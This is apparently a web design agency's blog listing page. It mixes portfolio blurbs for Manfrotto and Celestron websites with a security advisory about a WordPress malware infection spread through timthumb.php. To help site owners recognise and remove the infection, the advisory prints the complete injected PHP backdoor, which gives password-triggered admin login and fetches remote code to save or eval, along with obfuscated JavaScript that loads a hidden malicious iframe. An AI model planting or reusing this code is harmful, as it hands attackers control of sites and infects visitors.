Manfrotto Imagine More

  Manfrotto designs, manufactures and markets a wide range of camera and lighting support equipment for the professional photographic, film, theater, live entertainment and video markets. ManfrottoImagineMore.com project a marketing website focused on showcasing the story behind some of the more fascinating images. For this project GammaFX build a custom WordPress template from ground up. Here are some of the highlights: Responsive design would scale automatically to fit any device, whether it is a Smart Phone or a Personal Computer. Custom Banner Management module Full localization with support for 6 languages....

Read More »

New WordPress Malware Attack Exploiting timthumb.php Script

There is a new malware infection that has been affecting thousands of WordPress sites that utilize popular timthumb.php image resizing script. Hackers create backdoor access in you website and inject malicious JavaScript that attempts to download various Trojans and malware on your visitor’s computers. At this stage of the infection attackers are also modifying two of WordPress core files /wp-config.php and /wp-includes/js/l10n.js The wp-config.php gets the following new lines of code that allows hackers backdoor access to your website: if (isset($_GET['pingnow'])&& isset($_GET['pass'])){ if ($_GET['pass'] == ’66f041e16a60928b05a7e228a89c3799′){ if ($_GET['pingnow']== ‘login’){ $user_login = ‘admin’; $user = get_userdatabylogin($user_login); $user_id = $user->ID; wp_set_current_user($user_id, $user_login); wp_set_auth_cookie($user_id); do_action(‘wp_login’, $user_login); } if (($_GET['pingnow']== ‘exec’)&&(isset($_GET['file']))){ $ch = curl_init($_GET['file']); $fnm = md5(rand(0,100)).’.php’; $fp = fopen($fnm, “w”); curl_setopt($ch, CURLOPT_FILE, $fp); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 5); curl_exec($ch); curl_close($ch); fclose($fp); echo “// ”; } if (($_GET['pingnow']== ‘eval’)&&(isset($_GET['file']))){ $ch = curl_init($_GET['file']); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 5); $re = curl_exec($ch); curl_close($ch); eval($re); }}} The attackers also add the following code to your l10n.js file. var _0x4de4=["x64x20x35x28x29x7Bx62x20x30x3Dx32x2Ex63x28x22x33x22x29x3Bx32x2Ex39x2Ex36x28x30x29x3Bx30x2Ex37x3Dx27x33x27x3Bx30x2Ex31x2Ex61x3Dx27x34x27x3Bx30x2Ex31x2Ex6Bx3Dx27x34x27x3Bx30x2Ex69x3Dx27x66x3Ax2Fx2Fx67x2Dx68x2Ex6Dx2Fx6Ax2Ex65x27x7Dx38x28x35x2Cx6Cx29x3B","x7C","x73x70x6Cx69x74","x65x6Cx7Cx73x74x79x6Cx65x7Cx64x6Fx63x75x6Dx65x6Ex74x7Cx69x66x72x61x6Dx65x7Cx31x70x78x7Cx4Dx61x6Bx65x46x72x61x6Dx65x7Cx61x70x70x65x6Ex64x43x68x69x6Cx64x7Cx69x64x7Cx73x65x74x54x69x6Dx65x6Fx75x74x7Cx62x6Fx64x79x7Cx77x69x64x74x68x7Cx76x61x72x7Cx63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74x7Cx66x75x6Ex63x74x69x6Fx6Ex7Cx70x68x70x7Cx68x74x74x70x7Cx63x6Fx75x6Ex74x65x72x7Cx77x6Fx72x64x70x72x65x73x73x7Cx73x72x63x7Cx66x72x61x6Dx65x7Cx68x65x69x67x68x74x7Cx31x30x30x30x7Cx63x6Fx6D","x72x65x70x6Cx61x63x65","","x5Cx77x2B","x5Cx62","x67"];eval(function (_0x2f46x1,_0x2f46x2,_0x2f46x3,_0x2f46x4,_0x2f46x5,_0x2f46x6){_0x2f46x5=function (_0x2f46x3){return _0x2f46x3.toString(36)};if(!_0x4de4[5][_0x4de4[4]](/^/,String)){while(_0x2f46x3--){_0x2f46x6[_0x2f46x3.toString(_0x2f46x2)]=_0x2f46x4[_0x2f46x3]||_0x2f46x3.toString(_0x2f46x2);}_0x2f46x4=[function (_0x2f46x5){return _0x2f46x6[_0x2f46x5]}];_0x2f46x5=function (){return _0x4de4[6]};_0x2f46x3=1;};while(_0x2f46x3--){if(_0x2f46x4[_0x2f46x3]){_0x2f46x1=_0x2f46x1[_0x4de4[4]]( new RegExp(_0x4de4[7]+_0x2f46x5(_0x2f46x3)+_0x4de4[7],_0x4de4[8]),_0x2f46x4[_0x2f46x3]);}}return _0x2f46x1}(_0x4de4[0],23,23,_0x4de4[3][_0x4de4[2]](_0x4de4[1]),0,{})); This appends an iframe to the bottom of your blog through which they can inject future malware: <iframe id="iframe" src="http://counter-wordpress.com/frame.php" style="width: 1px; height: 1px; "></iframe> Solution Immediately remove or update the timthumb.php script.  When removing don’t forget to also update your theme files that rely on this functionality. Delete the cache folder located in the root of your template. Remove the code above from your wp-config.php file.  Normally, the last line of that file should read: require_once(ABSPATH . ‘wp-settings.php’); Remove the code above from the /wp-includes/js/l10n.js file. Update all WordPress and FTP passwords for good...

Read More »

SkyProdigy Ad Campaign Microsite

To introduce their groundbreaking new SkyProdigy telescopes Celestron launched an ad campaign centered around Caroline Moore, who discovered a supernova at the age of 14. GammaFX team designed and build this microsite to support the ad campaign. We also produced all videos that are featured on the website. This site is deployed on the WordPress MultiSite platform that allows our clients rapidly deploy microsites with unified control panel. It also utilizes out Shopatron Checkout Module for WordPress to achieve seamless integration with Shopatron eCommerce...

Read More »

SkyQ iPhone App Website

This website is dedicated to the first amateur astronomy iOS app launched by Celestron – world’s leading manufacturer of telescopes and other optical products. This site is deployed on the WordPress MultiSite platform that allows our clients rapidly deploy microsites with unified control panel.

Read More »